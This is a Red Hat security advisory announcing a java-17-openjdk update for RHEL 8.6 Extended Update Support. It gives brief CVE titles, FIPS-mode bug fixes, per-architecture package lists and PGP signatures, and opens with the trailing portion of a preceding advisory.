These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgue9zjgjWX9erEAQiNng/+Na7FF9ZJt2OPlvMgG3pBVJ5n5JlhFDRp  
uwgOPLBpQ+2cOPbEHx1DPzUDg410+h5c7g4pDsTNqQCvLpgIjUbXoPj0tF+xwKEi  
hKoqI07lOewIjWf9dD8LHiSXJOHpaDZ30+494Ufkn/tqsdyRNQJiDBJXINUp0BI9  
MGz5n/1sMU8Gcqgwmmi6W7Sq72wGdu+I1ozdS9ivukqJ9j0l5vNNsellSAk8+Cly  
GoL4hXMyfVpbjhmB/NHvO79TLzo9VrYjCPN9lO0S9mBGn0xvcsnEc1yQrGIn0fLb  
yU1ualEGZ5RVncXiKN/FLyJoexq/59cV66jHs5qbtj2YI8eEbU9JZN6uwnGJ1I8G  
CqEmwF6m5GEdGQyaheTQZU3hoLek2EFhbqrZ1e9lsE4StVLDg0tkZjMLNaFLBzSN  
ik373Tu6TkNdQ3kGjtAqMFmCv5IY9aUhJzqQDdCpaYQU9USpID636rr9+Qsblm4F  
vwwtv6g2WuJjzECrPtIa5iUZBwJT8NpC0uZYU1tXe9j3msKArDk52DcmxJ9DZ8S8  
oSBHGHXu+VmFdG3tzx8U5c+g6pSQY9w3lFMlSuVJCyx2z8zwhiwgjio29y7SXHzw  
aYOVQHoZPMBN9WBvenDlqmQC40D/g82LBFIzEzJF0QRCCAZ+89qB6C4g8TFwKtDd  
A2t9ncHN120=  
=/t5p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1911-01

Red Hat Security Advisory 2023-1891-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1891-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1891  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186828)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186832)

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186836)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186828 - Enable XML Signature provider in FIPS mode [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2186832 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2186836 - Add missing attributes when registering services in FIPS mode [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
java-17-openjdk-17.0.7.0.7-1.el8_6.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsfdzjgjWX9erEAQgq0Q//QX+4dXnHCWmG39cdVLR4dUj1TQcuGybm  
RXUuVFu/hqIQpE1jNPArLCeS19RWywZ8KI45rYLaGmhyR/mA6AJKMaJA3xCLtY+e  
aZXWmkcpmadVsLECb87sT5wNTEmWRnSPXoDWqv9zhDSTVOjr1Weg3wEPOBLnxEXu  
uTXm+ajW4zKeQC8vVKPkJV79vgb+0ltPRVASHgfjKTTkW7aDCN/u1+vkDhhnwI9s  
SklpX3Z3UDhjxu0VjHdhHBul/G5RnrHc0UVCjtuaKwPgQdgi9ueEgE5YDO+A+OWO  
xyVQlKtx+IHLt1rNy+kt4JVfbH3mR49VlPLdprF1jXtujWrx4X8O6G43zyKeerPt  
CaCiBHRzFPyuJJFRUfpZOWbEjY3jz93SekuWlwytPL2zn7GguEbtDtpW37KPyTO/  
GEhg6OXV9CkG+hYcN4vIbu4aOUNPKIz5EnTHKMj8KIGSq0rwvYrRo27ftFPkFC+D  
i7R3eBZjW1Av1c/7wFddWS+/+Oz17o47JBVCnOShINpUZB+kTPRvWLCyxkMzKghG  
a+T56VjqHYDc9JMSNyjqdV5CIWJQWxlkFkOo2xFlYL+k4p5bU3thYgrM9QYuCcCa  
A9s+FRyoRkR7WPBKmoY/AXTJHcSKmfE0EG63cusRdh4l1i7URfMNRtb4OgdpQLRa  
ucOmMTybnpk=  
=pXrM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#java